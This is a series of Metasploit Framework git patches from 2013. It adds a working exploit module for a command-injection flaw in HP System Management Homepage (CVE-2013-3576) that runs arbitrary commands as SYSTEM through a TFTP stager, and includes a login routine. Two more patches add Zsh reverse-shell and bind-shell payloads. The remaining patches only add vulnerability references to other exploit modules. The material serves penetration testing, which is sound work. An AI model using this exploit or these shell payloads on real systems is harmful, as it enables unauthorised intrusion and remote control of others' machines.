From 20621d17ded71088d78b75368c995c829b02ef9a Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 20 Jun 2013 03:08:42 -0500 Subject: [PATCH 01/20] Add CVE-2013-3576 - HP System Management Homepage exploit --- .../exploits/windows/http/hp_sys_mgmt_exec.rb | 94 +++++++++++++++++++ 1 file changed, 94 insertions(+) create mode 100644 modules/exploits/windows/http/hp_sys_mgmt_exec.rb diff --git a/modules/exploits/windows/http/hp_sys_mgmt_exec.rb b/modules/exploits/windows/http/hp_sys_mgmt_exec.rb new file mode 100644 index 0000000000..c67944b116 --- /dev/null +++ b/modules/exploits/windows/http/hp_sys_mgmt_exec.rb @@ -0,0 +1,94 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::CmdStagerTFTP + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "HP System Management Homepage JustGetSNMPQueue Command Injection", + 'Description' => %q{ + This module exploits a vulnerability found in HP System Management Homepage. By + supplying a specially crafted HTTP request, it is possible to control the + 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc), + which will be used in a exec() function. This results in arbitrary code execution + under the context of SYSTEM. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Markus Wulftange', + 'sinn3r' #Metasploit + ], + 'References' => + [ + ['CVE', '2013-3576'], + ['OSVDB', '94191'], + ['US-CERT-VU', '735364'] + ], + 'Payload' => + { + 'BadChars' => "\x00" + }, + 'DefaultOptions' => + { + 'SSL' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + ['Windows', {}], + ], + 'Privileged' => false, + 'DisclosureDate' => "Jun 11 2013", + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(2381) + ], self.class) + end + + def peer + "#{rhost}:#{rport}" + end + + def check + sig = Rex::Text.rand_text_alpha(10) + cmd = Rex::Text.uri_encode("echo #{sig}") + uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo" + + res = send_request_raw({'uri' => uri}) + if not res + print_error("#{peer} - Connection timed out") + return Exploit::CheckCode::Unknown + end + + return Exploit::CheckCode::Vulnerable if res.body =~ /#{sig}/ + Exploit::CheckCode::Safe + end + + def setup_stager + execute_cmdstager({ :temp => '.'}) + end + + def execute_command(cmd, opts={}) + # Payload will be: C:\hp\hpsmh\data\htdocs\smhutil + uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo") + print_status("#{peer} - Executing: #{cmd}") + res = send_request_raw({'uri' => uri}) + end + + def exploit + @uri = normalize_uri('smhutil', 'snmpchp/') + "&&" + setup_stager + end +end \ No newline at end of file From ebde05b78322c5900d6cf0488a1be3e1e035c8e3 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 20 Jun 2013 03:18:33 -0500 Subject: [PATCH 02/20] Improve check --- modules/exploits/windows/http/hp_sys_mgmt_exec.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/http/hp_sys_mgmt_exec.rb b/modules/exploits/windows/http/hp_sys_mgmt_exec.rb index c67944b116..0268212207 100644 --- a/modules/exploits/windows/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/windows/http/hp_sys_mgmt_exec.rb @@ -72,7 +72,10 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Vulnerable if res.body =~ /#{sig}/ + if res.body =~ /SNMP data engine output/ and res.body =~ /#{sig}/ + return Exploit::CheckCode::Vulnerable + end + Exploit::CheckCode::Safe end From 8dfe9b531895b1fad8d5c907d29f9fdf128fae4a Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 20 Jun 2013 04:16:23 -0500 Subject: [PATCH 03/20] Add login feature --- .../exploits/windows/http/hp_sys_mgmt_exec.rb | 89 ++++++++++++++++++- 1 file changed, 85 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/http/hp_sys_mgmt_exec.rb b/modules/exploits/windows/http/hp_sys_mgmt_exec.rb index 0268212207..aeae78a211 100644 --- a/modules/exploits/windows/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/windows/http/hp_sys_mgmt_exec.rb @@ -21,7 +21,9 @@ class Metasploit3 < Msf::Exploit::Remote supplying a specially crafted HTTP request, it is possible to control the 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc), which will be used in a exec() function. This results in arbitrary code execution - under the context of SYSTEM. + under the context of SYSTEM. Please note: In order for the exploit to work, the + victim must enable the 'tftp' command, which is the case by default for systems + such as Windows XP, 2003, etc. }, 'License' => MSF_LICENSE, 'Author' => @@ -51,22 +53,48 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => false, 'DisclosureDate' => "Jun 11 2013", 'DefaultTarget' => 0)) + register_options( [ - Opt::RPORT(2381) + Opt::RPORT(2381), + # USERNAME/PASS may not be necessary, because the anonymous access is possible + OptString.new("USERNAME", [false, 'The username to authenticate as']), + OptString.new("PASSWORD", [false, 'The password to authenticate with']) ], self.class) end + def peer "#{rhost}:#{rport}" end + def check + cookie = '' + + if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty? + cookie = login + if cookie.empty? + print_error("#{peer} - Login failed") + return Exploit::CheckCode::Safe + else + print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'") + end + end + sig = Rex::Text.rand_text_alpha(10) cmd = Rex::Text.uri_encode("echo #{sig}") uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo" - res = send_request_raw({'uri' => uri}) + req_opts = {} + req_opts['uri'] = uri + if not cookie.empty? + browser_chk = 'HPSMH-browser-check=done for this session' + curl_loc = "curlocation-#{datastore['USERNAME']}=" + req_opts['cookie'] = "#{cookie}; #{browser_chk}; #{curl_loc}" + end + + res = send_request_raw(req_opts) if not res print_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown @@ -79,18 +107,71 @@ class Metasploit3 < Msf::Exploit::Remote Exploit::CheckCode::Safe end + + def login + username = datastore['USERNAME'] + password = datastore['PASSWORD'] + + cookie = '' + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => '/proxy/ssllogin', + 'vars_post' => { + 'redirecturl' => '', + 'redirectquerystring' => '', + 'user' => username, + 'password' => password + } + }) + + if not res + fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out during login") + end + + # CpqElm-Login: success + if res.headers['CpqElm-Login'].to_s =~ /success/ + cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || '' + end + + cookie + end + + def setup_stager execute_cmdstager({ :temp => '.'}) end + def execute_command(cmd, opts={}) # Payload will be: C:\hp\hpsmh\data\htdocs\smhutil uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo") + + req_opts = {} + req_opts['uri'] = uri + if not @cookie.empty? + browser_chk = 'HPSMH-browser-check=done for this session' + curl_loc = "curlocation-#{datastore['USERNAME']}=" + req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}" + end + print_status("#{peer} - Executing: #{cmd}") - res = send_request_raw({'uri' => uri}) + res = send_request_raw(req_opts) end + def exploit + @cookie = '' + + if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty? + @cookie = login + if @cookie.empty? + fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed") + else + print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'") + end + end + @uri = normalize_uri('smhutil', 'snmpchp/') + "&&" setup_stager end From 29bc1695078bac69f7c826166c4821b48e049bdf Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 06:00:05 -0500 Subject: [PATCH 04/20] add osvdb ref 64171 --- modules/exploits/multi/http/jboss_bshdeployer.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index f350fe4984..dc74bec520 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2010-0738' ], # using a VERB other than GET/POST + [ 'OSVDB', '64171' ], [ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ], [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ], ], From 0dca5ede7ee43499e0155ba14c1c1bd416364c0f Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 06:07:08 -0500 Subject: [PATCH 05/20] add osvdb ref 78480 --- modules/exploits/multi/http/gitorious_graph.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/gitorious_graph.rb b/modules/exploits/multi/http/gitorious_graph.rb index 534eed47cc..33f883267d 100644 --- a/modules/exploits/multi/http/gitorious_graph.rb +++ b/modules/exploits/multi/http/gitorious_graph.rb @@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ], + [ 'OSVDB', '78480'], + [ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ] ], 'Privileged' => false, 'Payload' => From 42690a5c48a9200c54dacc7ef21828755b163647 Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 06:38:47 -0500 Subject: [PATCH 06/20] add osvdb ref 77492 --- modules/exploits/multi/http/familycms_less_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/multi/http/familycms_less_exec.rb b/modules/exploits/multi/http/familycms_less_exec.rb index a38617c1b3..4018724b45 100644 --- a/modules/exploits/multi/http/familycms_less_exec.rb +++ b/modules/exploits/multi/http/familycms_less_exec.rb @@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ + [ 'OSVDB', '77492' ], [ 'URL', 'https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/' ], [ 'URL', 'http://sourceforge.net/apps/trac/fam-connections/ticket/407' ], [ 'URL', 'http://rwx.biz.nf/advisories/fc_cms_rce_adv.html' ], From ade970afb888e25725c0b96a0c724362b3593785 Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 06:44:22 -0500 Subject: [PATCH 07/20] add osvdb ref 89322 --- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 0347f05503..f72f5da9d2 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -37,10 +37,11 @@ class Metasploit4 < Msf::Exploit::Remote ], 'References' => [ - ['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate) - ['CVE', '2013-0209'], - ['URL', 'http://www.sec-1.com/blog/?p=402'], - ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html'] + [ 'CVE', '2012-6315' ], # superseded by CVE-2013-0209 (duplicate) + [ 'CVE', '2013-0209' ], + [ 'OSVDB', '89322' ], + [ 'URL', 'http://www.sec-1.com/blog/?p=402' ], + [ 'URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html' ] ], 'Arch' => ARCH_CMD, 'Payload' => From ee21120c0486802fa55d84305ccb0daa9fa1ef9e Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 06:47:10 -0500 Subject: [PATCH 08/20] add osvdb ref 85509 --- modules/exploits/multi/http/mobilecartly_upload_exec.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb index 1282412f56..fe0d7c80df 100644 --- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb +++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb @@ -31,8 +31,9 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ - ['EDB', '20422'], - ['BID', '55399'] + [ 'OSVDB', '85509' ], + [ 'EDB', '20422 '], + [ 'BID', '55399 '] ], 'Payload' => { From 6cc7d9ccae78c6288e9dc215575eae770946ca65 Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 06:54:06 -0500 Subject: [PATCH 09/20] add osvdb ref 85446 and edb ref 20500 --- modules/exploits/multi/http/testlink_upload_exec.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index d91113a065..742e148378 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -29,9 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ - ['URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/'] - #['OSVDB', ''], - #['EDB', ''], + [ 'URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/' ], + [ 'OSVDB', '85446' ], + [ 'EDB', '20500' ] ], 'Payload' => { From d19bd7a9052b76f679051b0e0abcbc6929ff670f Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 07:01:59 -0500 Subject: [PATCH 10/20] add osvdb 85739, cve 2012-5159, edb 21834 --- modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb index 1ebb9d5a24..18e6cb50b9 100644 --- a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb +++ b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb @@ -22,7 +22,13 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ], + 'References' => + [ + [ 'CVE', '2012-5159' ], + [ 'OSVDB', '85739' ], + [ 'EDB', '21834' ], + [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php' ] + ], 'Privileged' => false, 'Payload' => { From 2b55e0e0a6a9236ecef49bdd431a3cadaf21b3af Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 07:17:22 -0500 Subject: [PATCH 11/20] add osvdb ref 64171 --- modules/exploits/multi/http/jboss_deploymentfilerepository.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index ae8b61a428..598b9c95cf 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2010-0738' ], # by using VERB other than GET/POST + [ 'OSVDB', '64171' ], [ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ], [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ], ], From 89f649ab991516ddfa0ced21eb060872d9d2a3de Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 07:28:29 -0500 Subject: [PATCH 12/20] add osvdb ref 89026 --- modules/exploits/multi/http/rails_xml_yaml_code_exec.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb index e5e5311505..9b7c122df4 100644 --- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb @@ -38,8 +38,9 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - ['CVE', '2013-0156'], - ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156'] + [ 'CVE', '2013-0156' ], + [ 'OSVDB', '89026' ], + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156' ] ], 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, From a824a0583e41ceddb51a342d796357730c5ff778 Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 07:34:15 -0500 Subject: [PATCH 13/20] add osvdb ref 89059 --- modules/exploits/multi/browser/java_jre17_jmxbean.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean.rb b/modules/exploits/multi/browser/java_jre17_jmxbean.rb index 486c706b73..5b89c84049 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean.rb @@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2013-0422' ], + [ 'OSVDB', '89059' ], [ 'US-CERT-VU', '625617' ], [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ], [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ], From cab20062a4b88f4b61c9edd2cd726aedda96caa9 Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 07:38:34 -0500 Subject: [PATCH 14/20] add osvdb ref 84706 --- modules/exploits/osx/local/setuid_tunnelblick.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index 691e167901..a07b825c3a 100644 --- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -31,6 +31,7 @@ class Metasploit4 < Msf::Exploit::Local 'References' => [ [ 'CVE', '2012-3485' ], + [ 'OSVDB', '84706' ], [ 'EDB', '20443' ], [ 'URL', 'http://blog.zx2c4.com/791' ] ], From abea7e6a47f2e1530ec2cc2c97170b6696970621 Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 07:55:50 -0500 Subject: [PATCH 15/20] add osvdb ref 76389 --- modules/exploits/osx/browser/safari_file_policy.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index f4e149e274..a06c09311a 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -39,9 +39,10 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ - ['CVE', '2011-3230'], - ['URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments'], - ['URL', 'http://support.apple.com/kb/HT5000'] + [ 'CVE', '2011-3230' ], + [ 'OSVDB', '76389' ], + [ 'URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments' ], + [ 'URL', 'http://support.apple.com/kb/HT5000' ] ], 'Payload' => { From a3a5dec369ab4787b00b3d984d8cb665fd4a9ae2 Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 08:03:34 -0500 Subject: [PATCH 16/20] add osvdb ref 94441 --- modules/exploits/multi/http/freenas_exec_raw.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/freenas_exec_raw.rb b/modules/exploits/multi/http/freenas_exec_raw.rb index 94f76a22c1..a00d8ae78c 100644 --- a/modules/exploits/multi/http/freenas_exec_raw.rb +++ b/modules/exploits/multi/http/freenas_exec_raw.rb @@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ], + [ 'OSVDB', '94441' ], + [ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ] ], 'Payload' => { From 66f442420267ad320aac3d9117f8a38d201da62b Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 10:41:14 -0500 Subject: [PATCH 17/20] fix formatting --- modules/exploits/multi/http/gitorious_graph.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/gitorious_graph.rb b/modules/exploits/multi/http/gitorious_graph.rb index 33f883267d..93f2cb02c0 100644 --- a/modules/exploits/multi/http/gitorious_graph.rb +++ b/modules/exploits/multi/http/gitorious_graph.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'OSVDB', '78480'], + [ 'OSVDB', '78480' ], [ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ] ], 'Privileged' => false, From 322ba27f0f071507ef738514a06d27401c7c31ed Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 11:17:23 -0500 Subject: [PATCH 18/20] re-order refs --- modules/exploits/multi/http/testlink_upload_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index 742e148378..53d69b4627 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -29,9 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ - [ 'URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/' ], [ 'OSVDB', '85446' ], - [ 'EDB', '20500' ] + [ 'EDB', '20500' ], + [ 'URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/' ] ], 'Payload' => { From 660c97f512cb92ac7a6e07faaa4e1564391a0152 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 20 Jun 2013 13:40:17 -0500 Subject: [PATCH 19/20] Add module for reverse zsh payload For #1985 --- .../payloads/singles/cmd/unix/reverse_zsh.rb | 48 +++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 modules/payloads/singles/cmd/unix/reverse_zsh.rb diff --git a/modules/payloads/singles/cmd/unix/reverse_zsh.rb b/modules/payloads/singles/cmd/unix/reverse_zsh.rb new file mode 100644 index 0000000000..e4547ad6f8 --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_zsh.rb @@ -0,0 +1,48 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Reverse TCP (via Zsh)', + 'Description' => %q{ + Connect back and create a command shell via Zsh. Note: Although Zsh is often + available, please be aware it isn't usually installed by default. + }, + 'Author' => 'Doug Prostko ', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'zsh', + 'Payload' => { 'Offsets' => {}, 'Payload' => '' } + )) + end + + def generate + return super + command_string + end + + def command_string + cmd = "zmodload zsh/net/tcp;" + cmd << "ztcp #{datastore['LHOST']} #{datastore['LPORT']};" + cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;" + cmd << "ztcp -c" + cmd + end +end From 86fc101c1f77169fce1ba81e4324c3e1156bf52e Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 20 Jun 2013 13:45:02 -0500 Subject: [PATCH 20/20] Add payload module bind zsh For #1984 --- modules/payloads/singles/cmd/unix/bind_zsh.rb | 62 +++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 modules/payloads/singles/cmd/unix/bind_zsh.rb diff --git a/modules/payloads/singles/cmd/unix/bind_zsh.rb b/modules/payloads/singles/cmd/unix/bind_zsh.rb new file mode 100644 index 0000000000..6a2898120a --- /dev/null +++ b/modules/payloads/singles/cmd/unix/bind_zsh.rb @@ -0,0 +1,62 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/bind_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit4 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Bind TCP (via Zsh)', + 'Description' => %q{ + Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is + often available, please be aware it isn't usually installed by default. + }, + 'Author' => + [ + 'Doug Prostko ' + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::BindTcp, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'zsh', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + cmd = "zmodload zsh/net/tcp;" + cmd << "ztcp -l #{datastore['LPORT']};" + cmd << "ztcp -a $REPLY;" + cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;" + cmd << "ztcp -c" + cmd + end +end